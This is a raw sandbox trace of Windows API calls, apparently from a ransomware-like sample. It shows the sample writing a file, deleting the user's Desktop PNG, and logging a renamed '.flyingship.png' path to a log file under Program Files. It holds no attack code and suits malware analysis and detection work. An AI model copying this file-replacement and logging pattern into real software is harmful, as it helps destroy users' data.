[0168.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0168.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0168.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0168.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0168.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0168.127] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0168.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd438, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0168.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.127] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0168.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0168.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0168.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0168.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0168.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0168.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0168.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0168.128] WriteFile (in: hFile=0x138, lpBuffer=0x8fff00*, nNumberOfBytesToWrite=0x41a7, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0x8fff00*, lpNumberOfBytesWritten=0x87eae0*=0x41a7, lpOverlapped=0x0) returned 1 [0168.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0168.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0168.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0168.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0168.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0168.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0168.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0168.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0168.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0168.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0168.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0168.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0168.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0168.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0168.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0168.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0168.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0168.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0168.129] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0168.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0168.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0168.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0168.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0168.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0168.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0168.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0168.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0168.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0168.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0168.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0168.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0168.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0168.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0168.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0168.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0168.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0168.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0168.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.133] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.133] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.133] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.133] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.133] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0168.133] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.133] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.133] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.135] FreeLibrary (hLibModule=0x75990000) returned 1 [0168.135] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.135] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.135] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.135] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png", lpFilePart=0x0) returned 0x35 [0168.136] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf332a6c0, ftCreationTime.dwHighDateTime=0x1d5df48, ftLastAccessTime.dwLowDateTime=0xc3dcaee0, ftLastAccessTime.dwHighDateTime=0x1d5e6d5, ftLastWriteTime.dwLowDateTime=0x992cb00, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x41a7, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="VLNsdshtM2X.png", cAlternateFileName="VLNSDS~1.PNG")) returned 0x90ae18 [0168.136] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vlnsdshtm2x.png")) returned 1 [0168.141] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf332a6c0, ftCreationTime.dwHighDateTime=0x1d5df48, ftLastAccessTime.dwLowDateTime=0xc3dcaee0, ftLastAccessTime.dwHighDateTime=0x1d5e6d5, ftLastWriteTime.dwLowDateTime=0x992cb00, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x41a7, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="VLNsdshtM2X.png", cAlternateFileName="VLNSDS~1.PNG")) returned 0 [0168.141] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0168.141] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.143] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.143] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0168.143] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0168.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0168.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0168.143] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0168.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0168.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0168.143] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0168.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0168.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0168.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0168.143] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0168.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0168.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0168.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0168.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0168.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0168.143] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0168.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0168.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0168.145] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0168.146] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.146] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0168.146] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.146] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0168.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0168.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0168.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0168.146] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0168.146] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0xbf8, lpOverlapped=0x0) returned 1 [0168.147] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0168.147] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0xbf8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.147] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0168.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0168.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0168.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0168.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.flyingship.png\r\n", cchWideChar=67, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 67 [0168.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x43) returned 0x9aa4f8 [0168.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.flyingship.png\r\n", cchWideChar=67, lpMultiByteStr=0x9aa4f8, cbMultiByte=67, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.flyingship.png\r\n", lpUsedDefaultChar=0x0) returned 67 [0168.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0168.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0168.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0168.147] WriteFile (in: hFile=0x138, lpBuffer=0x923b28*, nNumberOfBytesToWrite=0x42, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923b28*, lpNumberOfBytesWritten=0x87f43c*=0x42, lpOverlapped=0x0) returned 1 [0168.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0168.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.147] CloseHandle (hObject=0x138) returned 1 [0168.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0168.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0168.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0168.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0168.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0168.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0168.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0168.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0168.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0168.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0168.149] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0168.149] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0168.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0168.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0168.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0168.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0168.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0168.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0168.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0168.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0168.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0168.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0168.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0168.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0168.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0168.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0168.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0168.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0168.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0168.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0168.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0168.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0168.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0168.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0168.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0168.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0168.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0168.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0168.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0168.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0168.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0168.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0168.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0168.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0168.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0168.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0168.150] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0168.150] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 